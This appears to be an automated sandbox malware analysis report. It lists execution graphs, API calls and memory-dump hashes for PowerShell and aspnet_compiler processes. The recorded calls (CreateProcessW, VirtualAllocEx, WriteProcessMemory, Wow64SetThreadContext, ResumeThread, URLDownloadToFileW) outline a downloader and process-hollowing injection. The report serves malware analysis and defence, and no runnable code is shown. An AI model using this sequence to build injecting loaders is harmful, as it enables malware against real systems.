                                                                                                                                                          • Instruction ID: ab1811153c47a24f0ea25aa53932f4c4db6a920776a82df691a68c506a9aa64d
                                                                                                                                                          • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                                                                          • Instruction Fuzzy Hash:

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:3.2%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                          Signature Coverage:17%
                                                                                                                                                          Total number of Nodes:47
                                                                                                                                                          Total number of Limit Nodes:7

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2197890729.0000000005110000.00000040.00000800.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_5110000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 9ff003e26009716db60156482607f7543a14cfb5d9fc71a9f70e38e0882ae7ee
                                                                                                                                                          • Instruction ID: 9d2e368ea1efa56cb0c9f13afe3419a76457208291acc02897511719a840a9a6
                                                                                                                                                          • Opcode Fuzzy Hash: 9ff003e26009716db60156482607f7543a14cfb5d9fc71a9f70e38e0882ae7ee
                                                                                                                                                          • Instruction Fuzzy Hash: 32E11D75A00219EFDB05DF98D984A9EFBB2FF88310F248169E905AB351C771ED81CB94

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 05117E99
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2197890729.0000000005110000.00000040.00000800.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_5110000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DownloadFile
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1407266417-0
                                                                                                                                                          • Opcode ID: 317ab62c1e1f28c9cd68a4ccc8b79c1e05cdae056de38da0e2f186c68667ab67
                                                                                                                                                          • Instruction ID: 238f39fcd678f54d959520b375f691649b53d437d49f0eea9c2a457fe8f7b6aa
                                                                                                                                                          • Opcode Fuzzy Hash: 317ab62c1e1f28c9cd68a4ccc8b79c1e05cdae056de38da0e2f186c68667ab67
                                                                                                                                                          • Instruction Fuzzy Hash: FF21F5B5D0161ADFCB04CF99D984A9EFBF4FB48710F10816AE918A7350D374A954CBA4

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2201675380.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_7ac0000_powershell.jbxd
                                                                                                                                                          Similarity

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2201675380.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_7ac0000_powershell.jbxd
                                                                                                                                                          Similarity

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2201675380.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_7ac0000_powershell.jbxd
                                                                                                                                                          Similarity

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2201675380.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_7ac0000_powershell.jbxd
                                                                                                                                                          Similarity

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2201675380.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_7ac0000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2197571607.0000000004F8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F8D000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_4f8d000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2197571607.0000000004F8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F8D000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_4f8d000_powershell.jbxd
                                                                                                                                                          Similarity

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:5.8%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                          Signature Coverage:71.9%
                                                                                                                                                          Total number of Nodes:32
                                                                                                                                                          Total number of Limit Nodes:2
                                                                                                                                                          execution_graph 8160 4a97d67 8161 4a97d51 8160->8161 8163 4a97e0d 8161->8163 8165 4a98738 8161->8165 8166 4a98742 8165->8166 8167 4a97e65 8165->8167 8169 4a987b0 8166->8169 8170 4a9882d 8169->8170 8176 4a98eb4 8170->8176 8193 4a972f0 8170->8193 8172 4a99095 CreateProcessW 8174 4a99109 8172->8174 8173 4a988b8 8175 4a972fc Wow64SetThreadContext 8173->8175 8173->8176 8178 4a98923 8175->8178 8176->8172 8177 4a98da8 8176->8177 8177->8167 8178->8176 8178->8177 8179 4a98a36 VirtualAllocEx 8178->8179 8180 4a98a83 8179->8180 8180->8176 8181 4a98ad1 VirtualAllocEx 8180->8181 8183 4a98b25 8180->8183 8181->8183 8182 4a97314 WriteProcessMemory 8184 4a98b6f 8182->8184 8183->8176 8183->8177 8183->8182 8184->8176 8184->8177 8185 4a98cb9 8184->8185 8192 4a97314 WriteProcessMemory 8184->8192 8185->8176 8186 4a97314 WriteProcessMemory 8185->8186 8187 4a98ce2 8186->8187 8187->8176 8187->8177 8188 4a97320 Wow64SetThreadContext 8187->8188 8189 4a98d57 8188->8189 8189->8176 8190 4a98d5f 8189->8190 8190->8177 8191 4a98d68 ResumeThread 8190->8191 8191->8177 8192->8184 8194 4a98fb0 CreateProcessW 8193->8194 8196 4a99109 8194->8196

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 04A98A6A
                                                                                                                                                          • VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 04A98B0C
                                                                                                                                                            • Part of subcall function 04A97314: WriteProcessMemory.KERNELBASE(?,00000000,00000000,18BB2514,00000000,?,?,?,00000000,00000000,?,04A98B6F,?,00000000,?), ref: 04A993E4
                                                                                                                                                          • ResumeThread.KERNELBASE(?), ref: 04A98D8F
                                                                                                                                                          • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 04A990F4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2440361913.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_4a90000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocProcessVirtual$CreateMemoryResumeThreadWrite
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4270437565-0

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2440361913.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_4a90000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 04A990F4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2440361913.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_4a90000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 963392458-0

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,00000000,00000000,18BB2514,00000000,?,?,?,00000000,00000000,?,04A98B6F,?,00000000,?), ref: 04A993E4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2440361913.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_4a90000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3559483778-0

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,00000000,00000000,18BB2514,00000000,?,?,?,00000000,00000000,?,04A98B6F,?,00000000,?), ref: 04A993E4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2440361913.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_4a90000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3559483778-0

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04A98923), ref: 04A9925B
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2440361913.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_4a90000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 983334009-0

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04A98923), ref: 04A9925B
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2440361913.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_4a90000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 983334009-0

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04A98923), ref: 04A9925B
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2440361913.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_4a90000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 983334009-0
                                                                                                                                                          • Opcode ID: c412d9c390e0310aeb2c724b093c4978fc12849eb27866839a55656137874446
                                                                                                                                                          • Instruction ID: dc1c613cc7a5ff2f65c849aeb52bba669a51bbc04ddc609d1ba18328c8d6a2a0
                                                                                                                                                          • Opcode Fuzzy Hash: c412d9c390e0310aeb2c724b093c4978fc12849eb27866839a55656137874446
                                                                                                                                                          • Instruction Fuzzy Hash: 7C1117B59002499FDB10CF9AC544B9FBBF8EB88320F148029D918A7300D778A945CFA5

                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2475213844.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_7a40000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6980b44aca0db6cff564e835c0fa6d438d3cd6becbb70b0c79f28a125aff235c
                                                                                                                                                          • Instruction ID: fc3ab8758d0047bcdf7570b4fffe6f5332d3eb87890faf69921df9a3b1333418
                                                                                                                                                          • Opcode Fuzzy Hash: 6980b44aca0db6cff564e835c0fa6d438d3cd6becbb70b0c79f28a125aff235c
                                                                                                                                                          • Instruction Fuzzy Hash: C5F1E3B1B0420ADFDB158F69D8047AABBB2FFC5314F14C07AE5298B291DB72D885C791

                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2475213844.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_7a40000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 93544bd84ee029b2d8c3201ec356c661c6752e063b025e3dd9b0b05ee4961f32
                                                                                                                                                          • Instruction ID: 8c8ebab8e598831299d8d8716450b71bbbc9e9a3d4a70884389c8ca38dea8581
                                                                                                                                                          • Opcode Fuzzy Hash: 93544bd84ee029b2d8c3201ec356c661c6752e063b025e3dd9b0b05ee4961f32
                                                                                                                                                          • Instruction Fuzzy Hash: A4B129B170030ADFDB249B79880076BBBA5AFC1215F2480BBD665CB282DF77D845D7A1

                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2475213844.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_7a40000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d9f8ca7180b0436b55e5dc79a0903dca53f05e0c2761b4eaa94dfeafcd66edb6
                                                                                                                                                          • Instruction ID: 8586176b5c1bbfaccaefdf0cb5e9d8333f7379c9f9eeaa919c50ab7089b71ab7
                                                                                                                                                          • Opcode Fuzzy Hash: d9f8ca7180b0436b55e5dc79a0903dca53f05e0c2761b4eaa94dfeafcd66edb6
                                                                                                                                                          • Instruction Fuzzy Hash: 4DB10BB570434EDFDB158B69C8006A6BBB5AFC5211F24807BD565CB251EB32C9C1C762

                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2475213844.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_7a40000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 2fa8e5ba0484f636d3737accc2c8fc9815d0303cf0b4d33ca694bcd7c2301436
                                                                                                                                                          • Instruction ID: 72489ef6c3371e9e0c54e031170310784ad7e86499bafe6537d05ae868bf487e
                                                                                                                                                          • Opcode Fuzzy Hash: 2fa8e5ba0484f636d3737accc2c8fc9815d0303cf0b4d33ca694bcd7c2301436
                                                                                                                                                          • Instruction Fuzzy Hash: 9C81F3B1B00206CFDB289B79C54066BBBF5AFC5210F1480FAC769CB291EB32D845E791
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2475213844.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_7a40000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: eaa84300fcd9fc48741127cdd4f45516fb5e62e5c49d0dffe13c2f51d1db66c4
                                                                                                                                                          • Instruction ID: e11dc89c2e8d62a06b4921009c6a55abd5ae72d643f384badaea9e488f55b46e
                                                                                                                                                          • Opcode Fuzzy Hash: eaa84300fcd9fc48741127cdd4f45516fb5e62e5c49d0dffe13c2f51d1db66c4
                                                                                                                                                          • Instruction Fuzzy Hash: 473100F16053069FDB208F24841076B7BB0AFC1644F1980F7DA25DB292EB36C981E776
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2475213844.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_7a40000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 9c925a2c76dd0f1035659374d2fc56d2ab4095f455bdbd849fc2379e7463008b
                                                                                                                                                          • Instruction ID: b47738a54c1e6069e2ef85c58022f66bd93c2a312606a178ee2c103dddc393ae
                                                                                                                                                          • Opcode Fuzzy Hash: 9c925a2c76dd0f1035659374d2fc56d2ab4095f455bdbd849fc2379e7463008b
                                                                                                                                                          • Instruction Fuzzy Hash: A731F8F4A0034EDFCB298F29C5406A57BF5EFC2211F2981A6D8258B156E737D9C1CB62
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2475213844.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_7a40000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 49e15c3e36ba6e023055d73365cfef98bdaa88b53c57b2f882590946684b49f5
                                                                                                                                                          • Instruction ID: 90c85525f9e31ce62660cbff82cff813505684351e25f165524ccde7b37f386b
                                                                                                                                                          • Opcode Fuzzy Hash: 49e15c3e36ba6e023055d73365cfef98bdaa88b53c57b2f882590946684b49f5
                                                                                                                                                          • Instruction Fuzzy Hash: 5F31B4B1A0420ADFDB24DB65C444765BBF1BFC5214F0880A7D569CB291D732CC85C791
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2475213844.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_7a40000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2439652286.000000000317D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0317D000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_317d000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2439652286.000000000317D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0317D000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_317d000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:1.2%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:4.8%
                                                                                                                                                          Signature Coverage:8.3%
                                                                                                                                                          Total number of Nodes:145
                                                                                                                                                          Total number of Limit Nodes:14

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 367 417063-41708c call 42ead3 370 417092-4170a0 call 42f0d3 367->370 371 41708e-417091 367->371 374 4170b0-4170c1 call 42d463 370->374 375 4170a2-4170ad call 42f373 370->375 380 4170c3-4170d7 LdrLoadDll 374->380 381 4170da-4170dd 374->381 375->374 380->381
                                                                                                                                                          APIs
                                                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004170D5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2529118172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Load
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2234796835-0

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 392 42bda3-42bddc call 404593 call 42cf73 NtClose
                                                                                                                                                          APIs
                                                                                                                                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042BDD7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2529118172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3535843008-0

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 406 1092b60-1092b6c LdrInitializeThunk
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 407 1092c70-1092c7c LdrInitializeThunk
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2529118172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: N78Im7H$N78Im7H
                                                                                                                                                          • API String ID: 0-367025745
                                                                                                                                                          • Opcode ID: 28ee5cd632557669d2dd44e848351ed38fea0fc8904c636a7d43641d639951a5
                                                                                                                                                          • Instruction ID: 4648e5c59407577b98a54ef4615caafe9cf6d06a91d48ed6396808800c5f6b04
                                                                                                                                                          • Opcode Fuzzy Hash: 28ee5cd632557669d2dd44e848351ed38fea0fc8904c636a7d43641d639951a5
                                                                                                                                                          • Instruction Fuzzy Hash: 47216EB2A0011C7ADB11EFE5AC81AEF7BACDF41369B05406AF944A7200D66D4F4687E5

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          control_flow_graph 22 413913-413925 23 41392d-41397d call 42e883 call 417063 call 404503 call 4246f3 22->23 24 413928 call 42de73 22->24 33 41399d-4139a3 23->33 34 41397f-41398e PostThreadMessageW 23->34 24->23 34->33 35 413990-41399a 34->35 35->33
                                                                                                                                                          APIs
                                                                                                                                                          • PostThreadMessageW.USER32(N78Im7H,00000111,00000000,00000000), ref: 0041398A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2529118172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessagePostThread
                                                                                                                                                          • String ID: N78Im7H$N78Im7H
                                                                                                                                                          • API String ID: 1836367815-367025745
                                                                                                                                                          • Opcode ID: 6e9e158bc232b550949e5263d5508b52ec7a034c4804832ec4e49465489be997
                                                                                                                                                          • Instruction ID: 6d1566f69ca9e366af65c351ff72e1759d8cd6f1b82bc289e82513ea6d8c4bcc
                                                                                                                                                          • Opcode Fuzzy Hash: 6e9e158bc232b550949e5263d5508b52ec7a034c4804832ec4e49465489be997
                                                                                                                                                          • Instruction Fuzzy Hash: E501A1B1D0021C7AEB10AAA59C82DEF7B7CDF41698F058069FA5467241D6BC4F0687A5

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          control_flow_graph 36 4139ad-4139ae 37 4139b0-4139b9 36->37 38 41397c 36->38 43 4139bb-4139bf 37->43 39 41399d-4139a3 38->39 40 41397f-41398e PostThreadMessageW 38->40 40->39 42 413990-41399a 40->42 42->39 44 4139c1-4139c6 43->44 45 4139dd-4139e3 43->45 44->45 47 4139c8-4139cd 44->47 45->43 46 4139e5-4139e8 45->46 47->45 48 4139cf-4139d6 47->48 49 4139e9-4139ec 48->49 50 4139d8-4139db 48->50 50->45 50->49
                                                                                                                                                          APIs
                                                                                                                                                          • PostThreadMessageW.USER32(N78Im7H,00000111,00000000,00000000), ref: 0041398A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2529118172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
